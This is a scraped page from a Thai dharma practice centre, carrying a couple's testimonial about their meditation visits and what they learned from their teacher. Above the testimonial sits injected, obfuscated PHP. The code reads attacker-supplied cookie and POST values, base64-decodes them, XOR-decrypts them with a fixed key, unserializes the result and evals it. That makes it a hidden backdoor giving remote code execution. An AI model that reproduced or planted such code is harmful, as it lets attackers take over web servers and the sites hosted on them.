$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ประสบการณ์คุณธงชัย-สุมาลี ทิพยแสง | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

มาที่ศูนย์ฯ ครั้งแรกเมื่อวันเด็กแห่งชาติ 13 มค.50 มาศูนย์ฯ ครั้งที่สองเมื่อวันมาฆบูชา 3 มีค. 50 เริ่มต้นสนใจในการปฏิบัติธรรมอยู่บ้างแล้วโดยการอ่านจากหนังสือ และได้ไปศึกษาและปฏิบัติบ้างเล็กๆ น้อยๆ เพียง 2 ครั้ง แต่ไม่ทำให้ได้รับและประสบผล ต่อเมื่อได้ฟังวิทยุจากการสนทนาและสัมภาษณ์พ่อครูเมื่อประมาณต้นเดือนมกราคม 2550 เกิดความสนใจมากจึงได้มาที่ศูนย์และเริ่มปฏิบัติธรรม ผลที่ได้รับเมื่อธรรมะจัดสรรให้ถึงได้มาปฏิบัติธรรม ณ ที่นี่ พ่อครูได้ให้ความรู้ ความกระจ่างในภาษาธรรมและพยัญชนะบางคำบางเรื่อง ได้เข้าใจในศาสนาพุทธมากขึ้น และเข้าใจถูกต้องชัดเจน ทำให้เวลาจะทำอะไรมีสติมากขึ้น มีสติกำกับการกระทำในทุกๆเรื่อง ทำให้ไม่มีความกังวล สงสัย และไม่มีความตระหนี่ และทำให้ตัวเองพยายามที่จะได้ให้ผู้อื่นบ้างเหมือนๆกับที่พ่อครูได้ให้กับข้าพเจ้าในทุกๆเรื่อง การให้โดยไม่หวังสิ่งตอบแทนใดๆข้าพเจ้าทั้งสองจะทำสิ่งที่ได้รับในการปฏิบัติธรรม ณ ที่ศูนย์ฯ นำไปปฏิบัติในชีวิตประจำวันต่อไป และขอขอบพระคุณพ่อครู พร้อมทั้งเจ้าหน้าที่ของศูนย์ฯ ญาติธรรมทุกคนที่ให้ความกรุณา เมตตา ต่อข้าพเจ้าทั้งสองมา ณ โอกาสนี้ ด้วยความเคารพอย่างสูง